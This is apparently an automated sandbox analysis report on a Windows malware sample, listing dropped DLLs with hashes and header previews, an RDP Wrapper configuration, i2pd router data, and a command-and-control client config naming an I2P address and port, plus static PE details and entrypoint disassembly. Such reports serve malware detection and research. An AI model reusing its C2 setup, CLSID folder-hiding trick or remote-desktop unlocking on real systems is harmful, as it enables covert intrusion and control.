C:\Windows\Temp\459WBsWA

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	91136
Entropy (8bit):	6.2290767543196575
Encrypted:	false
SSDEEP:	1536:/PvW2FSiFAp7A1VBYj6PemyulDw02PijNFnRbPEMBI:/nW6SiFAp7A1VBYj6Pemyu1F2IFRbcM+
MD5:	4C086C8F48C4D0F8C20410E60340AEC9
SHA1:	77481360A98F3018F92A57B66E1DC7A6EC0DD0E8
SHA-256:	0A8FCB54DF736100F5792B6CE57AE165553712CB1E5701E4E0DD7620E6089F59
SHA-512:	CDBCC2FD4195A6FA5A343234A745E3E7A558F68A496D376FDF6A86D585C9FA39A64F0CEB20A2D2E6E30E59BA46F62493E500D6EEB033FA981DAA60F00EE42F14
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.....`......\...............................................R.....`... ..............................................................`..................d............................I..(......................h............................text...............................`..`.data...............................@....rdata.. T.......V..................@..@.pdata.......`.......8..............@..@.xdata..4....p.......B..............@..@.bss....@................................edata...............L..............@..@.idata...............N..............@....CRT....X............^..............@....tls.................`..............@....reloc..d............b..............@..B........................................................................................................................................................................

C:\Windows\Temp\CheAuE4k

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	105984
Entropy (8bit):	6.2884725801282775
Encrypted:	false
SSDEEP:	1536:wPwNKEKbLqYQtCwCxJtpyYNPvo3cxwNn6anP8XOCYA8CSs8qgu06wCYA8CSs8qgm:gwnKvqTaxJtpRP7wNbnP8Xf
MD5:	91A0DD29773FBFB7112C5FCFF1873C13
SHA1:	E1EAF1EFB134CAA7DA5AAA362830A68AB705C023
SHA-256:	AE2D023EBBFEEFD5A26EAA255AD3862C9A1C276BB0B46FF88EA9A9999406D6B6
SHA-512:	F7A665A218BB2CCEC32326B0E0A9845B2981F17445B5CB54BBA7D6EF9E200B4538EBD19916C2DACB0BBE1B409C14A499B23BA707874AE1F1B154279C90DC33DD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........................................@......K.....`... .........................................^.......................T............0..h...............................(.......................`............................text...X...........................`..`.data........ ......................@....rdata..Pc...0...d..................@..@.pdata..T............n..............@..@.xdata...............x..............@..@.bss....@................................edata..^...........................@..@.idata..............................@....CRT....X...........................@....tls......... ......................@....reloc..h....0......................@..B........................................................................................................................................................................

C:\Windows\Temp\LL369bff

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	37376
Entropy (8bit):	5.7181012847214445
Encrypted:	false
SSDEEP:	768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
MD5:	E3E4492E2C871F65B5CEA8F1A14164E2
SHA1:	81D4AD81A92177C2116C5589609A9A08A5CCD0F2
SHA-256:	32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
SHA-512:	59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............\|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................

C:\Windows\Temp\OKh5fbg5

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	115712
Entropy (8bit):	6.277217301921545
Encrypted:	false
SSDEEP:	1536:UsmIeUIfJAH791hpVMjqZm4S53kp21ahrvffvTn+33333333333333333333333L:I5fJAHZ1Kj7hkUYr3TlX8Y/biF
MD5:	D0F0423AEEE6B6FF6754D860603D46D0
SHA1:	A06F3B9605B3398BA68154DA39ADF26DDEE41743
SHA-256:	81DA68F52DF2ED997C374CCBEFC56849650770FB30EDA8F202BBC7FC3FE6A51D
SHA-512:	C30FAEDE4520FF1C859B8B39E351112CFC60DAECA98B1359F9F86AB79BCFB996BA84F35A5B178B4ABEC66152864720E58F741AE13D06B64913E240A1F9E6A633
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........................................P............`... .........................................^....................................@..p...............................(...................X................................text...8...........................`..`.data........0......."..............@....rdata..pi...@...j...$..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..p....@......................@..B........................................................................................................................................................................

C:\Windows\Temp\SCKoP3sQ

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	92672
Entropy (8bit):	6.242846530333761
Encrypted:	false
SSDEEP:	1536:Eb84+EBwpVmTx3sJg0jsEv5YqKnbGGOO5YhNDE:Eb84+EB7x3sJXwExKb/OOv
MD5:	FDCF93ACD089B505B524DDFA0FF947F9
SHA1:	A2BADA5807BA001758DBCE46DA634332A5CC14C2
SHA-256:	ADFE373F98CABF338577963DCEA279103C19FF04B1742DC748B9477DC0156BB4
SHA-512:	110455DC5C3F090A1341EE6D09D9B327CD03999C70D4A2C0B762B91BC334B0448E750CB1FD7B34CE729B8E1CD33B55A4E1FA1187586C2FF8850B2FD907AFE03E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.....f......\.........Io....................................C.....`... .........................................^....................`..................l............................J..(....................................................text...............................`..`.data...............................@....rdata...U.......V..................@..@.pdata.......`.......<..............@..@.xdata.......p.......F..............@..@.bss....`................................edata..^............P..............@..@.idata...............R..............@....CRT....X............d..............@....tls.................f..............@....reloc..l............h..............@..B........................................................................................................................................................................

C:\Windows\Temp\XFS8JZFg

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	8568
Entropy (8bit):	4.958673415285098
Encrypted:	false
SSDEEP:	96:e+I8WTr7LjdL33ZqPDNLWBsaBMG+xv9G86UJ5TMmyvmyLKkfUZleZnE/Ndm/7CIg:e+I8Mr7VtXl1zrrIqEVdm/7CItWR0SX
MD5:	27535CEE6740DFC50A78A0322415E67C
SHA1:	E80541CF15C8ED4C5EEDA8D8C24674A5B8A27F61
SHA-256:	FB0CDBF4E0215AE1866E97860C2AC3DD96E7498BFE2AF3D82378041CDFF7F292
SHA-512:	25F11A8262B5A2F59BD6C9D8673B5AD5A140EAE8C007244810B2924EB08B5CF54AE19E61BE5139319877278D11868BBD85BD2E6C67F5FAD4E2A458E2844EBC0C
Malicious:	false
Preview:	## Configuration file for a typical i2pd user.## See https://i2pd.readthedocs.io/en/latest/user-guide/configuration/.## for more options you can use in this file...## Lines that begin with "## " try to explain what's going on. Lines.## that begin with just "#" are disabled commands: you can enable them.## by removing the "#" symbol...## Tunnels config file.## Default: ~/.i2pd/tunnels.conf or /var/lib/i2pd/tunnels.conf.# tunconf = /var/lib/i2pd/tunnels.conf..## Tunnels config files path.## Use that path to store separated tunnels in different config files..## Default: ~/.i2pd/tunnels.d or /var/lib/i2pd/tunnels.d.# tunnelsdir = /var/lib/i2pd/tunnels.d..## Path to certificates used for verifying .su3, families.## Default: ~/.i2pd/certificates or /var/lib/i2pd/certificates.# certsdir = /var/lib/i2pd/certificates..## Where to write pidfile (default: /run/i2pd.pid, not used in Windows).# pidfile = /run/i2pd.pid..## Logging configuration section.## By default logs go to stdout with level 'inf

C:\Windows\Temp\ZNdEbgqy

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	9146880
Entropy (8bit):	6.674868432808522
Encrypted:	false
SSDEEP:	196608:DiRu5DnWLX6Cs3E1CPwDvt3uF8c339CME:DiRsCKCsU1CPwDvt3uFd9CME
MD5:	676064A5CC4729E609539F9C9BD9D427
SHA1:	F77BA3D5B6610B345BFD4388956C853B99C9EB60
SHA-256:	77D203E985A0BC72B7A92618487389B3A731176FDFC947B1D2EAD92C8C0E766B
SHA-512:	4C876E9C1474E321C94EA81058B503D695F2B5C9DCA9182C515F1AE6DE065099832FD0337D011476C553958808C7D6F748566734DEEE6AF1E74B45A690181D02
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f..........."...).t]......R..0........................................P............`... .......................................z..t... ...,............p..?...........p...............................`m.(....................*...............................text...(r]......t].................`..`.data.........]......x].............@....rdata..`>...@^..@....^.............@..@.pdata...?....p..@...^p.............@..@.xdata...t....t..v....t.............@..@.bss....`Q...@z..........................edata...t....z..v....z.............@..@.idata...,... ......................@....CRT....`....P......................@....tls.........`......................@....reloc.......p......................@..B........................................................................................................................................................................

C:\Windows\Temp\m28TQ56q

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	129024
Entropy (8bit):	6.313152038164236
Encrypted:	false
SSDEEP:	3072:Ex6tEkLvf8H5KRjus59IoZzhoesVR8ssT/nv:mEJ5qoZzfTX
MD5:	C89542ABA45CE1084760AE8DE6EAE09E
SHA1:	603560A3E4B6A8CB906CA98C907373ADBF4D3B1C
SHA-256:	1B6E559DC0CB37EBB2311C7CBF01B039F0DC1C3EC6DA057837451A531B1E2CB0
SHA-512:	60A0EB698AFE25CDDDB133FC937FEE478F1E0F8AF72B825C19BB2D544FAFCC217BABF6DD3D01704A106677E92AAE3DD57538E34731C950DA17F5715DF0732FF6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(.:..........\.........,.....................................,j....`... ...................................... ..^....0..D............................p..l...............................(...................p5...............................text...(9.......:..................`..`.data........P.......>..............@....rdata.......`.......@..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^.... ......................@..@.idata..D....0......................@....CRT....X....P......................@....tls.........`......................@....reloc..l....p......................@..B........................................................................................................................................................................

C:\Windows\Temp\nVYOsq5a

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	104448
Entropy (8bit):	6.259370376612282
Encrypted:	false
SSDEEP:	1536:VQbC3TviBZTprAFnfkRAJhzTjvlsy2nD+cRi6ZQOobsAx34:VGC3TKBZTWJfImTjx2D+ei6ZQOkx34
MD5:	7A8E8A0842D8D65713DEE5393E806755
SHA1:	AF6F3A52009FBF62C21A290EFC34A94C151B683E
SHA-256:	51C131081921626D22FAF44977D5E4DCFE00E5D6CDDEDA877A82F13631BE7C2E
SHA-512:	D1B8D93B7EFBEAA348D3A01293AD5D92BC8F28EB2554DF5E6E71506D00D135390082C52C18D0BC3F0439B068777D8B2C43AAED930C72E5FFAB2593EEAC470CF4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\.........?..............................0............`... .........................................^.......................$............ ..l............................v..(.......................`............................text...............................`..`.data...............................@....rdata...a... ...b..................@..@.pdata..$............h..............@..@.xdata..T............r..............@..@.bss.... ................................edata..^............\|..............@..@.idata...............~..............@....CRT....X...........................@....tls................................@....reloc..l.... ......................@..B........................................................................................................................................................................

C:\Windows\Temp\o1i2PUnI

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	115200
Entropy (8bit):	6.220212606349767
Encrypted:	false
SSDEEP:	1536:GQTj0nA3CwwEWLUbltMR8tGZ9G+Yv953a6nfgXqobk5l:GQP02C7LUbltdQG+Yra64Xqo45l
MD5:	BE6174AE2B452DA9D00F9C7C4D8A675B
SHA1:	0ABD2C76C82416AE9C30124C43802E2E49C8ED28
SHA-256:	A62BDF318386AAAB93F1D25144CFBDC1A1125AAAD867EFC4E49FE79590181EBF
SHA-512:	5631B1595F8CEE8C0DFA991852259FEE17EA8B73A9EED900A10450BBB7C846ACFC88C32930BE379D60EFA6AE1BBBEAD0A605A9F36E20129B53BCA36B13BA5858
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...(............\........."h.............................P......7F....`... .........................................^....................................@..l...........................@...(.......................h............................text...(...........................`..`.data........0......................@....rdata..`d...@...f...(..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B........................................................................................................................................................................

C:\Windows\Temp\sDCKxEib

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	Generic INItialization configuration [SLPolicy]
Category:	dropped
Size (bytes):	441513
Entropy (8bit):	5.449545529389614
Encrypted:	false
SSDEEP:	768:yUoDQVQpXQq4WDi9SUnpB8fbQnxJcy8RMFdKKb8x8Rr/d6gl/+f8jZ0ftlFn4m7N:eJGYB33L+MUIiG4IvREWddadl/Fy/k9u
MD5:	5FCB4B6362E04A8D1C6ECD33AD246FB9
SHA1:	E198D3E81C4B8527451133BCEAFA799D2115A8BB
SHA-256:	060EE1BCB5817709F2D73BB1762C5ABCA09FAF5271E8F90503A84F9657ECDCD9
SHA-512:	B5839D79D1A34DA86BA9B34A9105F7CC05E642C99D84D55E3E88833544DCE9FDD840F7ABF0F09CD4470734F24CA7C600C3C64E4041A4481806590D3B7A6A032D
Malicious:	false
Preview:	; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-08-21..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS

C:\Windows\Temp\uXRg8pYu

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	62449
Entropy (8bit):	7.807149241969407
Encrypted:	false
SSDEEP:	1536:uzSVMhnCwJEZ4dJ4douBYaGGIW2QzPzp343mR:vKE29uBFBo2R
MD5:	688FDFAE15F328A84E8F19F8F4193AF2
SHA1:	C65D4CDA0C93B84154DFBC065AE78B9E2F7ECFA8
SHA-256:	8D37FF2458FDE376A41E9E702A9049FF89E78B75669C0F681CFCAFBA9D49688E
SHA-512:	F19BC7F204DBE3449ABE9494BFFF8BE632F20F1B4B8272F0AF71C4CEC344A20617C0909C024CB4A4E0C6B266D386CB127554DC70F3A6AA7A81DAF1A8748F5D2D
Malicious:	false
Preview:	I2Psu3.................................1726476901......reseed@cnc.netPK.........E0Y.L.`........;...routerInfo-CVE7qh1P~hZ~PX2FDY6wRTmrdDd1eQ5Nv7yBC0EcH-o=.dat.^...)....?E4T{w...U........5.x.ZT.v...C..~m.....r.u.._..0._>a....B.......1in..o...R...M.....2.0..1...?.&..1@.._.s....KrbA.-..5c..Nzvep.KU.s.n...Gy.E.y...GU.c..A.i.[HU..{I@v..5c.-..53....5..f Kpp..c....:.N..I..u..~~..u....%a........~F>.&.9..I..........\..Ff&..f...!CL!#.!....[.3..:.......J....:..DO...B.l.\gc....r...P__W[..C[......_.d#wG.t....ts.rG. .R.@...b....*c..t..#[...l......D.....<.0...B. ].4...P....(...J...>2.02243....}dll`aan`bj...................%...F..~Q......>....If.a..%..!...E......@...BD...d:..!.b'sDZ.5k^j.g.H\..JI..../..IM,N.N-.:..Z.I"(..$............+..e.....Y..[_...U....t.....n8CEbM...k.%W.^....`i..&[.Y.{}...d.Vn.g..0...PK.........>0Y....:.......;...routerInfo-7xGNdz1Bi17~K7q9lFTjGVPnQdN0tqNJ-xpZt5MSp1Q=.dat{lr...~./..<Yw_...".....%..E.....O..l.(.R<K^...>.i..{.D.s-.+...

C:\Windows\Temp\yoOlSNNi

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	Generic INItialization configuration [cnccli]
Category:	dropped
Size (bytes):	214
Entropy (8bit):	5.0997449470012635
Encrypted:	false
SSDEEP:	6:1EVQLD4oeMuJO+70X1YIzODSVkXpTRL9gWVUDeLn:CjogJO+70X1YeCS2X9vgpKL
MD5:	26702FAAB91B6B144715714A96728F39
SHA1:	CBDC34FC8FD3559CD49475FB5BC76176A5F88FF8
SHA-256:	83D30846DD5576DE38A512B17163419D22FF35F2F5B0FE613C401E8A5A25B7A4
SHA-512:	50D35D3DCD60B6E57C1A277E6C3E7AFBB5C2B46425732FC5A9FD3C0A55FEBF5AB3F05411A83CEC230AAC40199774FF78F30848D57D1E04A11B9E60777B038289
Malicious:	false
Preview:	[main]..version=400004957b19a09d..[cnccli]..server_host=c21a8709..server_port=41674..server_timeo=15000..i2p_try_num=10..i2p_sam3_timeo=30000..i2p_addr=2lyi6mgj6tn4eexl6gwnujwfycmq7dcus2x42petanvpwpjlqrhq.b32.i2p..

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.468688843745489
Encrypted:	false
SSDEEP:	6144:IzZfpi6ceLPx9skLmb0foZWSP3aJG8nAgeiJRMMhA2zX4WABluuN7jDH5S:eZHtoZWOKnMM6bFpVj4
MD5:	9791BAE5FAB0F94EE20D4A05BC6A7C81
SHA1:	6E5EA4D25E30A8C733F844A40C097DC9EB39D5FF
SHA-256:	474CFC1C619393D40C10F30CEE1C502007D6FD052E8299BAE718C46D9172285F
SHA-512:	E509B407A6128BC21331A869FD638AA299AE5EDCFFE6D2900B592CD7B4AAC758903CF612E67B2D12F0B6073E6061EDADAB793BD42F7FD0EE8C82925028A3C60C
Malicious:	false
Preview:	regfI...I....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.F>.................................................................................................................................................................................................................................................................................................................................................\0(.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	6.026248680279594
TrID:	Win64 Executable GUI (202006/5) 92.64% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% VXD Driver (31/22) 0.01%
File name:	file.exe
File size:	5'654'528 bytes
MD5:	d2ecf5f2a271da094867f6dc31b3d60e
SHA1:	b8b7ec24a5c6f1a0ad96e989003516b656256d2e
SHA256:	99a5de18c71cfd7fd32d3f2b5bf4a60a4b2aa41f9bdbafa042693375927d11b1
SHA512:	9b6f1a5ccf1c7312cf0a7bcbf253516d8ae9f56cc5408d6fd209e0bc26eca9237b6fed0fddd94746bba14c4f5560f279cf933647facf31a77762e05f66ff365d
SSDEEP:	49152:wDShb1KwGF4Ilow5sADndfK0IptgSoP6MRM2BTXwmlPJmqHc4h/:VQK0/lX9PJhHc
TLSH:	6B464A3F72A4C269C15EC17FC1A7CF40E533B9795B33C6E742A106689A168C75EBE620
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win64..$7.......................................................................................................................................

File Icon


Icon Hash:	1f6c6cececf16117

Static PE Info

General

Entrypoint:	0x83d530
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:
Time Stamp:	0x670ABB69 [Sat Oct 12 18:09:45 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	bf7e94a88b651f53cc57bdb23fcd2c2f

Entrypoint Preview

Instruction
push ebp
dec eax
sub esp, 20h
dec eax
mov ebp, esp
nop
dec eax
lea ecx, dword ptr [FFFEF838h]
call 00007FA9081D2030h
dec eax
mov eax, dword ptr [0005F064h]
dec eax
mov ecx, dword ptr [eax]
call 00007FA908485961h
dec eax
mov eax, dword ptr [0005F055h]
dec eax
mov ecx, dword ptr [eax]
mov dl, 01h
call 00007FA908488610h
dec eax
mov eax, dword ptr [0005F044h]
dec eax
mov ecx, dword ptr [eax]
dec eax
mov edx, dword ptr [FFFEF0CAh]
dec esp
mov eax, dword ptr [0005F5D3h]
call 00007FA908485963h
dec eax
mov eax, dword ptr [0005F027h]
dec eax
mov ecx, dword ptr [eax]
call 00007FA908485B74h
call 00007FA9081C9A3Fh
jmp 00007FA9085F7F2Ah
nop
nop
call 00007FA9081C9C36h
nop
dec eax
lea esp, dword ptr [ebp+20h]
pop ebp
ret
dec eax
nop
dec eax
lea eax, dword ptr [00000000h+eax]
dec eax
sub esp, 28h
call 00007FA9081C91CCh
dec eax
add esp, 28h
ret
int3
int3
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x4ae000	0x97	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4a8000	0x48de	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x52a000	0x4b400	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x4eb000	0x3e9c4	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4b1000	0x39178	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4b0000	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x4a92c0	0x1130	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x4ad000	0xe3c	.didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x43c5c0	0x43c600	4dc050f2b4f53a64168d2d2b3bb04cf6	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x43e000	0x5ee38	0x5f000	c96c0455df11a9306f23138f836838b1	False	0.22957699424342104	data	4.71291425546474	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x49d000	0xaab4	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x4a8000	0x48de	0x4a00	586f243f7059a7c5e3cc1599e712e400	False	0.24266258445945946	data	4.353393974383116	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata	0x4ad000	0xe3c	0x1000	cffac5f732be0532b2a4d072e873b001	False	0.2392578125	data	3.075608222202654	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x4ae000	0x97	0x200	32e00411291ba873b0de75e561276889	False	0.251953125	data	1.8329856927687613	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls	0x4af000	0x1e4	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x4b0000	0x6d	0x200	cb0aedb4d69d2e7d3f915611730f186c	False	0.1953125	data	1.375717479766274	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x4b1000	0x39178	0x39200	3895bdffdd7a3e7f1d857eb7488e8413	False	0.469976579595186	data	6.475527769134284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.pdata	0x4eb000	0x3e9c4	0x3ea00	6086c296052ff020a33a7ba75c81e109	False	0.491813248502994	data	6.369980557431763	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x52a000	0x4b400	0x4b400	6ac1aadc717308fa144f050a1a349f13	False	0.5633175872093024	data	6.403217845607993	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x52aca8	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	English	United States	0.38636363636363635
RT_CURSOR	0x52addc	0x134	data	English	United States	0.4642857142857143
RT_CURSOR	0x52af10	0x134	data	English	United States	0.4805194805194805
RT_CURSOR	0x52b044	0x134	data	English	United States	0.38311688311688313
RT_CURSOR	0x52b178	0x134	data	English	United States	0.36038961038961037
RT_CURSOR	0x52b2ac	0x134	data	English	United States	0.4090909090909091
RT_CURSOR	0x52b3e0	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	English	United States	0.4967532467532468
RT_ICON	0x52b514	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2688			0.4147121535181237
RT_ICON	0x52c3bc	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152			0.476985559566787
RT_ICON	0x52cc64	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 320			0.48554913294797686
RT_ICON	0x52d1cc	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600			0.5167012448132781
RT_ICON	0x52f774	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224			0.5719981238273921
RT_ICON	0x53081c	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088			0.7109929078014184
RT_STRING	0x530c84	0x8b0	data			0.2648381294964029
RT_STRING	0x531534	0x2e4	data			0.4540540540540541
RT_STRING	0x531818	0x2a4	data			0.4896449704142012
RT_STRING	0x531abc	0x200	data			0.53125
RT_STRING	0x531cbc	0x1f0	data			0.5
